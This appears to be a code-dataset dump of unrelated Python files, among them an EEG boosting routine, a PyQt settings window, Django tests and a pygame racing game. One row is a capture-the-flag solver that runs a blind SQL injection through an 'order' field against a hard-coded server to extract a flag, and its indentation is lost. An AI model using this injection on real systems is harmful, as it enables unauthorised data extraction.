        else:
            return tuple(h * (self.y_scale / sx) for h, sx in
                         zip(self.h, self.x_scale))
def boosting(y, x, tstart, tstop, scale_data=True, delta=0.005, mindelta=None,
             error='l2'):
    """Estimate a temporal response function through boosting

    Parameters
    ----------
    y : NDVar
        Signal to predict.
    x : NDVar | sequence of NDVar
        Signal to use to predict ``y``. Can be sequence of NDVars to include
        multiple predictors. Time dimension must correspond to ``y``.
    tstart : float
        Start of the TRF in seconds.
    tstop : float
        Stop of the TRF in seconds.
    scale_data : bool | 'inplace'
        Scale ``y`` and ``x`` before boosting: subtract the mean and divide by
        the standard deviation (when ``error='l2'``) or the mean absolute
        value (when ``error='l1'``). With ``scale_data=True`` (default) the
        original ``y`` and ``x`` are left untouched; use ``'inplace'`` to save
        memory by scaling the original ``y`` and ``x``.
    delta : scalar
        Step for changes in the kernel.
    mindelta : scalar
        If the error for the training data can't be reduced, divide ``delta``
        in half until ``delta < mindelta``. The default is ``mindelta = delta``,
        i.e. ``delta`` is constant.
    error : 'l2' | 'l1'
        Error function to use (default is ``l2``).

    Returns
    -------
    result : BoostingResult
        Object containing results from the boosting estimation (see
        :class:`BoostingResult`).
    """
    # check arguments
    mindelta_ = delta if mindelta is None else mindelta
    # check y and x
    # normalize x to a tuple of NDVars, remembering whether a bare NDVar was
    # passed so the result can mirror the input's structure
    if isinstance(x, NDVar):
        x_name = x.name
        x = (x,)
        multiple_x = False
    else:
        x = tuple(x)
        assert all(isinstance(x_, NDVar) for x_ in x)
        x_name = tuple(x_.name for x_ in x)
        multiple_x = True
    y_name = y.name
    time_dim = y.get_dim('time')
    if any(x_.get_dim('time') != time_dim for x_ in x):
        raise ValueError("Not all NDVars have the same time dimension")
    # scale y and x appropriately for error function
    data = (y,) + x
    if scale_data:
        data_mean = tuple(d.mean('time') for d in data)
        # scale_data=True hits the int branch (bool is an int subclass) and
        # demeans copies; 'inplace' demeans the caller's data
        if isinstance(scale_data, int):
            data = tuple(d - d_mean for d, d_mean in zip(data, data_mean))
        elif isinstance(scale_data, str):
            if scale_data == 'inplace':
                for d, d_mean in zip(data, data_mean):
                    d -= d_mean
            else:
                raise ValueError("scale_data=%r" % scale_data)
        else:
            raise TypeError("scale_data=%r" % (scale_data,))
        if error == 'l1':
            data_scale = tuple(d.abs().mean('time') for d in data)
        elif error == 'l2':
            data_scale = tuple(d.std('time') for d in data)
        else:
            raise ValueError("error=%r; needs to be 'l1' or 'l2' if "
                             "scale_data=True." % (error,))
        # check for flat data (normalising would result in nan)
        zero_var = tuple(np.any(v == 0) for v in data_scale)
        if any(zero_var):
            raise ValueError("Can not scale %s because it has 0 variance" %
                             dataobj_repr(data[zero_var.index(True)]))
        for d, d_scale in zip(data, data_scale):
            d /= d_scale
        y = data[0]
        x = data[1:]
        has_nan = tuple(np.isnan(v.sum()) for v in data_scale)
    else:
        data_mean = data_scale = (None,) * (len(x) + 1)
        has_nan = tuple(np.isnan(v.sum()) for v in data)
    # check for NaN (blocks boosting process)
    if any(has_nan):
        raise ValueError("Can not use %s for boosting because it contains NaN" %
                         dataobj_repr(data[has_nan.index(True)]))
    # x_data: predictor x time array
    # flatten all predictors into one (n_x, n_times) array; x_meta remembers
    # each predictor's name, extra dimension and row-slice for reassembly
    x_data = []
    x_meta = []
    n_x = 0
    for x_ in x:
        if x_.ndim == 1:
            xdim = None
            data = x_.x[newaxis, :]
            index = n_x
        elif x_.ndim == 2:
            xdim = x_.dims[not x_.get_axis('time')]
            data = x_.get_data((xdim.name, 'time'))
            index = slice(n_x, n_x + len(data))
        else:
            raise NotImplementedError("x with more than 2 dimensions")
        x_data.append(data)
        x_meta.append((x_.name, xdim, index))
        n_x += len(data)
    if len(x_data) == 1:
        x_data = x_data[0]
    else:
        x_data = np.vstack(x_data)
    # y_data: ydim x time array
    if y.ndim == 1:
        ydim = None
        y_data = y.x[None, :]
    elif y.ndim == 2:
        ydim = y.dims[not y.get_axis('time')]
        y_data = y.get_data((ydim.name, 'time'))
    else:
        raise NotImplementedError("y with more than 2 dimensions")
    # TRF extra dimension
    trf_dim = ydim
    # prepare trf (by cropping data)
    i_start = int(round(tstart / time_dim.tstep))
    i_stop = int(round(tstop / time_dim.tstep))
    trf_length = i_stop - i_start
    # crop x and y asymmetrically so that x[t] aligns with y[t + i_start]
    if i_start < 0:
        x_data = x_data[:, -i_start:]
        y_data = y_data[:, :i_start]
    elif i_start > 0:
        x_data = x_data[:, :-i_start]
        y_data = y_data[:, i_start:]
    # progress bar
    n_y = len(y_data)
    pbar = tqdm(desc="Boosting %i signals" % n_y if n_y > 1 else "Boosting",
                total=n_y * 10)
    # result containers
    res = np.empty((3, n_y))  # r, rank-r, error
    h_x = np.empty((n_y, n_x, trf_length))
    # boosting
    if N_WORKERS:
        # Make sure cross-validations are added in the same order, otherwise
        # slight numerical differences can occur
        job_queue, result_queue = setup_workers(
            y_data, x_data, trf_length, delta, mindelta_, N_SEGS, error)
        Thread(target=put_jobs, args=(job_queue, n_y, N_SEGS)).start()
        # collect results
        # h_segs accumulates per-segment kernels keyed by y index; once all
        # N_SEGS segments of one y arrived, average them into h_x[y_i]
        h_segs = {}
        for _ in range(n_y * N_SEGS):
            y_i, seg_i, h = result_queue.get()
            pbar.update()
            if y_i in h_segs:
                h_seg = h_segs[y_i]
                h_seg[seg_i] = h
                if len(h_seg) == N_SEGS:
                    del h_segs[y_i]
                    hs = [h for h in (h_seg[i] for i in range(N_SEGS)) if
                          h is not None]
                    if hs:
                        h = np.mean(hs, 0, out=h_x[y_i])
                        res[:, y_i] = evaluate_kernel(y_data[y_i], x_data, h, error)
                    else:
                        h_x[y_i] = 0
                        res[:, y_i] = 0.
            else:
                h_segs[y_i] = {seg_i: h}
    else:
        # single-process fallback: same cross-validation loop, run inline
        for y_i, y_ in enumerate(y_data):
            hs = []
            for i in range(N_SEGS):
                h = boost_1seg(x_data, y_, trf_length, delta, N_SEGS, i,
                               mindelta_, error)
                if h is not None:
                    hs.append(h)
                pbar.update()
            if hs:
                h = np.mean(hs, 0, out=h_x[y_i])
                res[:, y_i] = evaluate_kernel(y_, x_data, h, error)
            else:
                h_x[y_i].fill(0)
                res[:, y_i].fill(0.)
    pbar.close()
    dt = time.time() - pbar.start_t
    # correlation
    rs, rrs, errs = res
    if ydim is None:
        r = rs[0]
        rr = rrs[0]
        err = errs[0]
        isnan = np.isnan(r)
    else:
        isnan = np.isnan(rs)
        rs[isnan] = 0
        r = NDVar(rs, (ydim,), cs.stat_info('r'), 'correlation')
        rr = NDVar(rrs, (ydim,), cs.stat_info('r'), 'rank correlation')
        err = NDVar(errs, (ydim,), y.info.copy(), 'fit error')
    # TRF
    # reassemble h_x into one NDVar per original predictor using x_meta
    h_time = UTS(tstart, time_dim.tstep, trf_length)
    hs = []
    for name, dim, index in x_meta:
        h_x_ = h_x[:, index, :]
        if dim is None:
            dims = (h_time,)
        else:
            dims = (dim, h_time)
        if trf_dim is None:
            h_x_ = h_x_[0]
        else:
            dims = (trf_dim,) + dims
        hs.append(NDVar(h_x_, dims, y.info.copy(), name))
    if multiple_x:
        hs = tuple(hs)
        idx = slice(1, None)
    else:
        hs = hs[0]
        idx = 1
    return BoostingResult(hs, r, isnan, dt, VERSION, delta, mindelta, error, rr,
                          err, scale_data, data_mean[0], data_scale[0],
                          data_mean[idx], data_scale[idx], y_name, x_name,
                          tstart, tstop)
def boost_1seg(x, y, trf_length, delta, nsegs, segno, mindelta, error,
               return_history=False):
    """Boosting with one test segment determined by regular division

    Based on port of svdboostV4pred

    Parameters
    ----------
    x : array (n_stims, n_times)
        Stimulus.
    y : array (n_times,)
        Dependent signal, time series to predict.
    trf_length : int
        Length of the TRF (in time samples).
    delta : scalar
        Step of the adjustment.
    nsegs : int
        Number of segments
    segno : int [0, nsegs-1]
        which segment to use for testing
    mindelta : scalar
        Smallest delta to use. If no improvement can be found in an iteration,
        the first step is to divide delta in half, but stop if delta becomes
        smaller than ``mindelta``.
    error : 'l2' | 'Sabs'
        Error function to use.
    return_history : bool
        Return error history as second return value.

    Returns
    -------
    history[best_iter] : None | array
        Winning kernel, or None if 0 is the best kernel.
    test_sse_history : list (only if ``return_history==True``)
        SSE for test data at each iteration.
    """
    assert x.ndim == 2
    assert y.shape == (x.shape[1],)
    if not 0 <= segno < nsegs:
        raise ValueError("segno=%r" % segno)
    # partition the time axis into ``nsegs`` equal segments; segment ``segno``
    # is held out for testing and the rest is used for training
    seg_len = x.shape[1] // nsegs
    test_index = slice(seg_len * segno, seg_len * (segno + 1))
    if segno == 0:
        train_index = (slice(seg_len, None),)
    elif segno == nsegs - 1:
        train_index = (slice(0, -seg_len),)
    else:
        train_index = (slice(0, seg_len * segno),
                       slice(seg_len * (segno + 1), None))
    y_train = tuple(y[..., i] for i in train_index)
    y_test = (y[..., test_index],)
    x_train = tuple(x[:, i] for i in train_index)
    x_test = (x[:, test_index],)
    return boost_segs(y_train, y_test, x_train, x_test, trf_length, delta,
                      mindelta, error, return_history)
def boost_segs(y_train, y_test, x_train, x_test, trf_length, delta, mindelta,
               error, return_history):
    """Boosting supporting multiple array segments

    Parameters
    ----------
    y_train, y_test : tuple of array (n_times,)
        Dependent signal, time series to predict.
    x_train, x_test : array (n_stims, n_times)
        Stimulus.
    trf_length : int
        Length of the TRF (in time samples).
    delta : scalar
        Step of the adjustment.
    mindelta : scalar
        Smallest delta to use. If no improvement can be found in an iteration,
        the first step is to divide delta in half, but stop if delta becomes
        smaller than ``mindelta``.
    error : str
        Error function to use.
    return_history : bool
        Return error history as second return value.

    Returns
    -------
    history[best_iter] : None | array
        Winning kernel, or None if 0 is the best kernel.
    test_sse_history : list (only if ``return_history==True``)
        SSE for test data at each iteration.
    """
    # resolve error-function names to callables (note: rebinds ``error``)
    delta_error = DELTA_ERROR_FUNC[error]
    error = ERROR_FUNC[error]
    n_stims = len(x_train[0])
    if any(len(x) != n_stims for x in chain(x_train, x_test)):
        raise ValueError("Not all x have same number of stimuli")
    n_times = [len(y) for y in chain(y_train, y_test)]
    if any(x.shape[1] != n for x, n in zip(chain(x_train, x_test), n_times)):
        raise ValueError("y and x have inconsistent number of time points")
    h = np.zeros((n_stims, trf_length))
    # buffers
    # ys_error holds residuals (y minus current prediction), updated in place
    y_train_error = tuple(y.copy() for y in y_train)
    y_test_error = tuple(y.copy() for y in y_test)
    ys_error = y_train_error + y_test_error
    xs = x_train + x_test
    new_error = np.empty(h.shape)
    new_sign = np.empty(h.shape, np.int8)
    # history lists
    history = []
    test_error_history = []
    # pre-assign iterators
    iter_h = tuple(product(range(h.shape[0]), range(h.shape[1])))
    iter_train_error = list(zip(y_train_error, x_train))
    iter_error = list(zip(ys_error, xs))
    for i_boost in range(999999):
        history.append(h.copy())
        # evaluate current h
        e_test = sum(error(y) for y in y_test_error)
        e_train = sum(error(y) for y in y_train_error)
        test_error_history.append(e_test)
        # stop the iteration if all the following requirements are met
        # 1. more than 10 iterations are done
        # 2. The testing error in the latest iteration is higher than that in
        #    the previous two iterations
        if (i_boost > 10 and e_test > test_error_history[-2] and
                e_test > test_error_history[-3]):
            # print("error(test) not improving in 2 steps")
            break
        # generate possible movements -> training error
        for i_stim, i_time in iter_h:
            # +/- delta
            e_add = e_sub = 0.
            for y_err, x in iter_train_error:
                e_add_, e_sub_ = delta_error(y_err, x[i_stim], delta, i_time)
                e_add += e_add_
                e_sub += e_sub_
            if e_add > e_sub:
                new_error[i_stim, i_time] = e_sub
                new_sign[i_stim, i_time] = -1
            else:
                new_error[i_stim, i_time] = e_add
                new_sign[i_stim, i_time] = 1
        # pick the single (stim, time) step with the lowest training error
        i_stim, i_time = np.unravel_index(np.argmin(new_error), h.shape)
        new_train_error = new_error[i_stim, i_time]
        delta_signed = new_sign[i_stim, i_time] * delta
        # If no improvements can be found reduce delta
        if new_train_error > e_train:
            delta *= 0.5
            if delta >= mindelta:
                # print("new delta: %s" % delta)
                continue
            else:
                # print("No improvement possible for training data")
                break
        # update h with best movement
        h[i_stim, i_time] += delta_signed
        # abort if we're moving in circles
        if i_boost >= 2 and h[i_stim, i_time] == history[-2][i_stim, i_time]:
            # print("Same h after 2 iterations")
            break
        elif i_boost >= 3 and h[i_stim, i_time] == history[-3][i_stim, i_time]:
            # print("Same h after 3 iterations")
            break
        # update error
        for err, x in iter_error:
            update_error(err, x[i_stim], delta_signed, i_time)
    # else:
    #     print("maxiter exceeded")
    best_iter = np.argmin(test_error_history)
    # print(' (%i iterations)' % (i_boost + 1))
    if return_history:
        return history[best_iter] if best_iter else None, test_error_history
    else:
        return history[best_iter] if best_iter else None
def setup_workers(y, x, trf_length, delta, mindelta, nsegs, error):
    """Start N_WORKERS boosting processes sharing ``y`` and ``x`` read-only.

    Returns ``(job_queue, result_queue)``: jobs are ``(y_i, seg_i)`` tuples,
    results are ``(y_i, seg_i, h)`` tuples produced by boosting_worker.
    """
    n_y, n_times = y.shape
    n_x, _ = x.shape
    # 'd' = C double; RawArray provides unsynchronized shared memory that the
    # child processes can read without pickling/copying per job
    y_buffer = RawArray('d', n_y * n_times)
    y_buffer[:] = y.ravel()
    x_buffer = RawArray('d', n_x * n_times)
    x_buffer[:] = x.ravel()
    # bounded queues (200) apply back-pressure to the job producer thread
    job_queue = Queue(200)
    result_queue = Queue(200)
    args = (y_buffer, x_buffer, n_y, n_times, n_x, trf_length, delta,
            mindelta, nsegs, error, job_queue, result_queue)
    for _ in range(N_WORKERS):
        Process(target=boosting_worker, args=args).start()
    return job_queue, result_queue
def boosting_worker(y_buffer, x_buffer, n_y, n_times, n_x, trf_length,
                    delta, mindelta, nsegs, error, job_queue, result_queue):
    """Worker-process loop: pull ``(y_i, seg_i)`` jobs, boost, push results.

    Exits when it receives a job whose y index is JOB_TERMINATE.
    """
    # re-wrap the shared RawArrays as numpy views (no copy)
    y = np.frombuffer(y_buffer, np.float64, n_y * n_times).reshape((n_y, n_times))
    x = np.frombuffer(x_buffer, np.float64, n_x * n_times).reshape((n_x, n_times))
    while True:
        y_i, seg_i = job_queue.get()
        if y_i == JOB_TERMINATE:
            return
        h = boost_1seg(x, y[y_i], trf_length, delta, nsegs, seg_i, mindelta,
                       error)
        result_queue.put((y_i, seg_i, h))
def put_jobs(queue, n_y, n_segs):
    """Feed every (y index, segment index) boosting job into ``queue``, then
    enqueue one JOB_TERMINATE sentinel per worker so all workers exit."""
    for y_i in range(n_y):
        for seg_i in range(n_segs):
            queue.put((y_i, seg_i))
    for _ in range(N_WORKERS):
        queue.put((JOB_TERMINATE, None))
def apply_kernel(x, h, out=None):
    """Predict ``y`` by applying kernel ``h`` to ``x``

    Each stimulus row of ``x`` (shape (n_stims, n_samples)) is convolved with
    the matching kernel row of ``h`` (shape (n_stims, n_trf_samples)); the
    truncated convolutions are summed. If ``out`` is given it is zeroed and
    accumulated into, otherwise a new array is allocated.
    """
    if out is None:
        out = np.zeros(x.shape[1])
    else:
        out.fill(0)
    n_samples = len(out)
    for ind, h_row in enumerate(h):
        out += np.convolve(h_row, x[ind])[:n_samples]
    return out
def evaluate_kernel(y, x, h, error):
    """Fit quality statistics

    Returns
    -------
    r : float | array
        Pearson correlation.
    rank_r : float | array
        Spearman rank correlation.
    error : float | array
        Error corresponding to error_func.
    """
    error_func = ERROR_FUNC[error]
    y_pred = apply_kernel(x, h)
    # discard the onset period (kernel length - 1 samples), where the
    # prediction is incomplete
    onset = h.shape[-1] - 1
    y_true = y[..., onset:]
    y_hat = y_pred[..., onset:]
    r = np.corrcoef(y_true, y_hat)[0, 1]
    rank_r = spearmanr(y_true, y_hat)[0]
    return r, rank_r, error_func(y_true - y_hat)
|
998,339 | 81976ec91094be04dfbd0469e698db1d313d6a4f | import requests
import string
flag = "CHTB{"
url = "http://138.68.151.248:31892/api/list"
restart = True
while restart:
restart = False
for i in string.ascii_letters + string.digits + "!@#$*.&+^()@_{}":
payload = flag + i
post_data = {'order': '(select case when (select count(flag) from flag_e6ed09eb02 where instr(flag, \"' + payload + '\")) then id else count end)'}
r = requests.post(url, json=post_data, allow_redirects=False)
if r.json()[0]['id'] == 1:
print(payload)
restart = True
flag = payload
if i == "}":
print("\nFlag: " + flag)
exit(0)
break |
998,340 | 96da8096a5d6476cf8df56b82036579958c12994 | s = input()
count = 0
# length of the longest run of consecutive non-'S' characters seen so far
# (renamed from ``max``, which shadowed the builtin of the same name)
longest = 0
for ch in s:
    if ch == 'S':
        count = 0
    else:
        count += 1
        if count > longest:
            longest = count
print(longest)
998,341 | 6457a7bb8228431264bad4e721df4da88f3cff42 | import sys
from PyQt5 import QtWidgets, QtGui, QtCore
from PyQt5.QtWidgets import (QWidget, QLabel, QLineEdit, QTextEdit, QGridLayout, QVBoxLayout, QRadioButton, QInputDialog)
from hyperparameters.hyperparameterConsts import DistanceAlgorithm
from hyperparameters.hyperparametersState import CollaborativeHyperparametersState
class ParamsWidget(QtWidgets.QWidget):
    """Settings window for collaborative-filtering hyperparameters: the
    distance algorithm (radio buttons) and the n in n-nearest-neighbours
    (integer input). UI labels are in Polish.
    """
    def __init__(self, width, height):
        super().__init__( flags = QtCore.Qt.Window )
        # NOTE(review): these assignments shadow QWidget.width()/height()
        # methods on this instance — confirm nothing calls them as methods
        self.width = width
        self.height = height
        # working copy of the selection; persisted only on "save and exit"
        self.currentlyChosenAlgorithm = CollaborativeHyperparametersState().distanceAlgorithm
        self.initUI()
    def initUI(self):
        """Build the window: save/back buttons plus the distance and
        neighbour panels laid out on a stretched grid."""
        grid = QGridLayout()
        grid.setRowStretch(0, 1)
        grid.setRowStretch(1, 3)
        grid.setRowStretch(2, 3)
        grid.setRowStretch(3, 2)
        grid.setRowStretch(4, 3)
        grid.setRowStretch(5, 1)
        saveButton = QtWidgets.QPushButton("Zapisz i wyjdź")
        saveButton.setObjectName("PlayerButton")
        # NOTE(review): setFixedSize expects int arguments; width*0.2 is a
        # float — confirm PyQt5 still coerces this without a TypeError
        saveButton.setFixedSize(self.width*0.2, self.height*0.08)
        saveButton.clicked.connect(self.saveAndExit)
        grid.addWidget(saveButton, 4, 1)
        exitButton = QtWidgets.QPushButton("Wróć do menu")
        exitButton.setObjectName("PlayerButton")
        exitButton.setFixedSize(self.width*0.2, self.height*0.08)
        exitButton.clicked.connect(self.exitToMenu)
        grid.addWidget(exitButton, 1, 2)
        distanceLayout = self.getDistanceLayout()
        grid.addLayout(distanceLayout, 2, 1)
        neighboursLayout = self.getNeighboursLayout()
        grid.addLayout(neighboursLayout, 3, 1)
        self.setLayout(grid)
        self.show()
    def exitToMenu(self):
        """Return to the menu without persisting any changes."""
        self.window().showMenu()
    def saveAndExit(self):
        """Persist the chosen algorithm and (if valid) the neighbour count,
        then return to the menu."""
        CollaborativeHyperparametersState().distanceAlgorithm = self.currentlyChosenAlgorithm
        print("setting distance {}".format(self.currentlyChosenAlgorithm))
        n = self.nInput.text()
        if n and n.isdigit():
            print("setting number {}".format(n))
            CollaborativeHyperparametersState().numberOfNeighbours = int(n)
        else:
            # invalid input: restore the stored value in the field
            self.nInput.setText(CollaborativeHyperparametersState().numberOfNeighbours.__str__())
        self.window().showMenu()
    def algorithmSelectionChanged(self):
        """Slot for radio-button toggles; remembers the checked algorithm."""
        radiobutton = self.sender()
        if radiobutton.isChecked():
            self.currentlyChosenAlgorithm = radiobutton.algorithm
    def getDistanceLayout(self):
        """Create the distance-algorithm panel: a label plus one radio button
        per DistanceAlgorithm, pre-checked from the stored state."""
        distanceBox = QGridLayout()
        distanceLabel = QLabel('Wybierz metodę obliczania dystansu')
        distanceLabel.setObjectName('ParamLabel')
        distanceBox.addWidget(distanceLabel, 0, 0)
        canberraRadiobutton = QRadioButton("Canberra Distance")
        canberraRadiobutton.algorithm = DistanceAlgorithm.canberraDistance
        canberraRadiobutton.toggled.connect(self.algorithmSelectionChanged)
        self.setChecked(canberraRadiobutton)
        distanceBox.addWidget(canberraRadiobutton, 1, 0)
        # note: grid rows don't follow creation order — euclidean goes to
        # row 3 and cosine (created later) to row 2
        euclideanRadiobutton = QRadioButton("Euclidean distance")
        euclideanRadiobutton.algorithm = DistanceAlgorithm.euclideanDistance
        euclideanRadiobutton.toggled.connect(self.algorithmSelectionChanged)
        self.setChecked(euclideanRadiobutton)
        distanceBox.addWidget(euclideanRadiobutton, 3, 0)
        cosineDistanceRadiobutton = QRadioButton("Cosine distance")
        cosineDistanceRadiobutton.algorithm = DistanceAlgorithm.cosineDistance
        cosineDistanceRadiobutton.toggled.connect(self.algorithmSelectionChanged)
        self.setChecked(cosineDistanceRadiobutton)
        distanceBox.addWidget(cosineDistanceRadiobutton, 2, 0)
        manhattanRadiobutton = QRadioButton("Manhattan distance")
        manhattanRadiobutton.algorithm = DistanceAlgorithm.manhattanDistance
        manhattanRadiobutton.toggled.connect(self.algorithmSelectionChanged)
        self.setChecked(manhattanRadiobutton)
        distanceBox.addWidget(manhattanRadiobutton, 4, 0)
        chebyshevRadiobutton = QRadioButton("Chebyshev distance")
        chebyshevRadiobutton.algorithm = DistanceAlgorithm.chebyshevDistance
        chebyshevRadiobutton.toggled.connect(self.algorithmSelectionChanged)
        self.setChecked(chebyshevRadiobutton)
        distanceBox.addWidget(chebyshevRadiobutton, 5, 0)
        return distanceBox
    def setChecked(self, radiobutton):
        """Check the button iff its algorithm matches the stored selection."""
        currentlyCheckedAlgorithm = CollaborativeHyperparametersState().distanceAlgorithm
        if (radiobutton.algorithm == currentlyCheckedAlgorithm):
            radiobutton.setChecked(True)
        else:
            radiobutton.setChecked(False)
    def getNeighboursLayout(self):
        """Create the neighbour-count panel: a label plus a 3-digit
        integer-validated line edit pre-filled from the stored state."""
        neighboursGrid = QVBoxLayout()
        label = QLabel('Wybierz n w n-nearest neighbours')
        label.setObjectName('ParamLabel')
        neighboursGrid.addWidget(label)
        self.nInput = QLineEdit()
        self.nInput.setObjectName('NInput')
        self.nInput.setValidator(QtGui.QIntValidator())
        self.nInput.setMaxLength(3)
        n = CollaborativeHyperparametersState().numberOfNeighbours.__str__()
        print("Current n: {}".format(n))
        self.nInput.setText(n)
        neighboursGrid.addWidget(self.nInput)
        return neighboursGrid
|
998,342 | a3e2a90725e4622d29f6216c2e2161b106253e3d | # Make sure your output matches the assignment *exactly*
# Classify the reported daily computer hours into one of three messages.
daily_hours = int(input())
if daily_hours >= 4:
    print("Don't forget to take breaks!")
elif daily_hours >= 2:
    print("This seems reasonable")
else:
    print("That's rare nowadays!")
998,343 | a2743b8b17bd3d5fe88bb81aead4421fed0e2764 | """
This file demonstrates writing tests using the unittest module. These will pass
when you run "manage.py test".
Replace this with more appropriate tests for your application.
"""
from django.test import TestCase
from users.models import Profile
from goods.models import Comment
from goods.views import try_ban
def test_ban(comment=None):
    """Exercise the comment-voting ban flow for user 'forever_banned'.

    Votes on ``comment`` (or the user's latest comment) with 20 synthetic
    profiles, then returns the tuple
    (banned before, try_ban result, banned after).
    """
    p = Profile.objects.get(username='forever_banned')
    # fall back to the user's most recent comment when none is supplied
    c=comment or Comment.objects.filter(
        owner__user__username='forever_banned'
    ).order_by('-time')[0]
    # 10 voters named qqq*: alternating up (1) / down (0) votes
    for i in range(0, 10):
        q, o_o = Profile.objects.get_or_create(username='qqq%d'%i)
        if i % 2 == 0:
            m = 1
        else: m = 0
        c.vote(q, m)
    # 10 more voters named dis*: all down-votes
    for i in range(0, 10):
        d, o_o = Profile.objects.get_or_create(username='dis%d'%i)
        c.vote(d, 0)
    a = p.is_banned()
    # OUT: False
    b = try_ban(p)
    # OUT: {'mark__avg': 0.25}
    # NOTE(review): rebinding ``c`` here discards the Comment bound above —
    # harmless now, but confusing; consider a different name
    c = p.is_banned()
    # OUT: True
    return a, b, c
class SimpleTest(TestCase):
    """Sanity check that the test runner is wired up correctly."""

    def test_basic_addition(self):
        """
        Tests that 1 + 1 always equals 2.
        """
        self.assertEqual(2, 1 + 1)
998,344 | 2117673308736aaa7eaef120b18418ee862ae045 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-05-15 16:09
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds the boolean ``is_essence`` flag (default False) to the Post model;
    # the verbose_name bytes are the UTF-8 encoding of "加精" (featured).

    dependencies = [
        ('users', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='post',
            name='is_essence',
            field=models.BooleanField(default=False, verbose_name=b'\xe5\x8a\xa0\xe7\xb2\xbe'),
        ),
    ]
|
998,345 | b741f8939acba2b53fab16b1204bffef39ab1eed | from . import base
def send_to_ml(obj, ml_name: str) -> None:
    """
    Send an object to the specified ml process
    @param obj The object to be sent
    @param ml_name The name of the target ml process
    """
    # thin delegation to the shared communication backend
    base.send_to_ml(obj, ml_name)
def send_to_all_ml(obj) -> None:
    """
    Send an object to all ml processes
    @param obj The object to be sent
    """
    # thin delegation to the shared communication backend
    base.send_to_all_ml(obj)
def recv_from_ml(ml_name, to_wait: bool = False):
    """
    Receive an object sent from the specified ml process
    @param ml_name The name of the target ml process
    @param to_wait Whether to wait until the object is received or not
    @return The received object.
            If `to_wait` is False and there is nothing to receive, return None.
    """
    # thin delegation to the shared communication backend
    return base.recv_from_ml(ml_name, to_wait)
def recv_from_all_ml(to_wait: bool = False):
    """
    Receive objects sent from all ml processes
    @param to_wait Whether to wait until all the objects are received or not
    @return A dictionary. The key is the game of the ml process,
            the value is the received object from that process.
            If `to_wait` is False and there is nothing to receive from that process,
            the value will be None.
    """
    # thin delegation to the shared communication backend
    return base.recv_from_all_ml(to_wait)
def wait_ml_ready(ml_name):
    """
    Block until the specified ml process has sent its "READY" command
    @param ml_name The name of the target ml process
    """
    while True:
        if recv_from_ml(ml_name, to_wait = True) == "READY":
            return
def wait_all_ml_ready():
    """
    Block until every ml process has sent its "READY" command
    """
    # take a non-blocking snapshot of all processes, then wait on each one
    # that has not reported "READY" yet, in turn
    for ml_process, received_msg in recv_from_all_ml(to_wait = False).items():
        while received_msg != "READY":
            received_msg = recv_from_ml(ml_process, to_wait = True)
998,346 | 31fdb46860c31b2ebe388f62b737b8ace587f187 | import subprocess
def gitSubmodule():
    """Run ``git submodule update --init --recursive``; return its exit code."""
    return subprocess.call(['git', 'submodule', 'update', '--init', '--recursive'])
def podInstall():
    """Run CocoaPods ``pod install`` (hard-coded Homebrew path); return its exit code."""
    return subprocess.call(['/usr/local/bin/pod', 'install'])
def gitClone(url):
    """Run ``git clone <url>``; return the git exit code."""
    return subprocess.call(['git', 'clone', url])
|
998,347 | 9ffda343e0353600f0758008ed61b73c021907ce | import os
import subprocess
import sys
PATH = os.path.join(sys.exec_prefix, 'Scripts', 'pyuic5.exe')
def main():
    """Compile every Qt Designer ``.ui`` file in the cwd to a ``.py`` module."""
    for ui_file in os.listdir('.'):
        if ui_file.endswith('.ui'):
            # Fixed: the format string was '{}.py.' (trailing dot), which
            # produced output files named like 'dialog.py.' instead of
            # importable 'dialog.py' modules.
            target = '{}.py'.format(os.path.splitext(ui_file)[0])
            subprocess.run([PATH, ui_file, '-o', target])
if __name__ == '__main__':
main()
|
998,348 | d21e4d87e9ff7931d831ae6c20aa13da0e0237ba |
class BlogPost:
    """A blog entry backed by an HTML template and a numeric page id."""

    def __init__(self, template, iden):
        # Template filename rendered for this post.
        self.template = template
        # Numeric id used in the /post?page_id=... URL.
        self.id = iden

    def listString(self):
        """Return an anchor tag linking to this post's page (empty link text)."""
        return '<a href="/post?page_id={}"></a>'.format(self.id)

    def toDict(self):
        """Return a dict representation of the post (currently empty)."""
        return {}
# Registered posts: template filenames in display order; page ids are the
# sequential positions 0..4, exactly as before.
blog_list = [
    BlogPost(template, page_id)
    for page_id, template in enumerate([
        "stressfreeme.html",
        "thinkingbeing.html",
        "Foodieforlife.html",
        "Laugh.html",
        "fitness_home.html",
    ])
]
|
998,349 | ad01954db2ebecad0fd32d44f69fe622772df610 | # -*- coding: utf-8 -*-
"""
Created on Tue May 14 11:03:30 2019
My first attempt at a game in python
This is a racing game.
Game will stop if car crashes
@author: Steven
"""
## preample ##
# import library
import pygame
import time
import random
from os import path
# Directory holding all image assets, relative to this file.
img_dir = path.join(path.dirname(__file__), 'img')
# initiate pygame
pygame.init()
# pygame module for loading and playing sounds
pygame.mixer.init()
# define colors (RGB)
black = (0, 0, 0)
white = (255, 255, 255)
green = (112, 209, 48)
gray = (109, 109, 109)
beige = (237, 207, 132)
# sprite size in pixels and player speed in pixels per frame
car_width = 100
car_height = 100
carSpeed = 5
## GAME OPTIONS ##
# game resolution
display_width = 800
display_height = 600
# x positions of the five lane-marking columns
rdpaint = [200, 300, 400, 500, 600]
# set size of game display
gameDisplay = pygame.display.set_mode((display_width, display_height))
# title of game window
pygame.display.set_caption('Ghost Driver')
# define game clock
clock = pygame.time.Clock()
# ASSETS
# Load graphics
playerImg = pygame.image.load(path.join(img_dir, 'car.png')).convert_alpha()
# Sprites
class Player(pygame.sprite.Sprite):
    """The player-controlled car, moved with the arrow keys."""

    def __init__(self):
        pygame.sprite.Sprite.__init__(self)
        self.image = pygame.transform.scale(playerImg, (car_width, car_height))
        self.rect = self.image.get_rect()
        # Start centred horizontally, near the bottom of the screen.
        self.rect.centerx = display_width / 2
        self.rect.bottom = display_height * 0.8
        self.speedx = 0
        self.speedy = 0

    def update(self):
        """Read the keyboard state and move the car accordingly."""
        # Reset velocity first so the car stops when no key is held.
        self.speedx = 0
        self.speedy = 0
        pressed = pygame.key.get_pressed()
        if pressed[pygame.K_LEFT]:
            self.speedx = -carSpeed
        if pressed[pygame.K_RIGHT]:
            self.speedx = carSpeed
        if pressed[pygame.K_UP]:
            self.speedy = -carSpeed
        if pressed[pygame.K_DOWN]:
            self.speedy = carSpeed
        self.rect.x += self.speedx
        self.rect.y += self.speedy
class Object(pygame.sprite.Sprite):
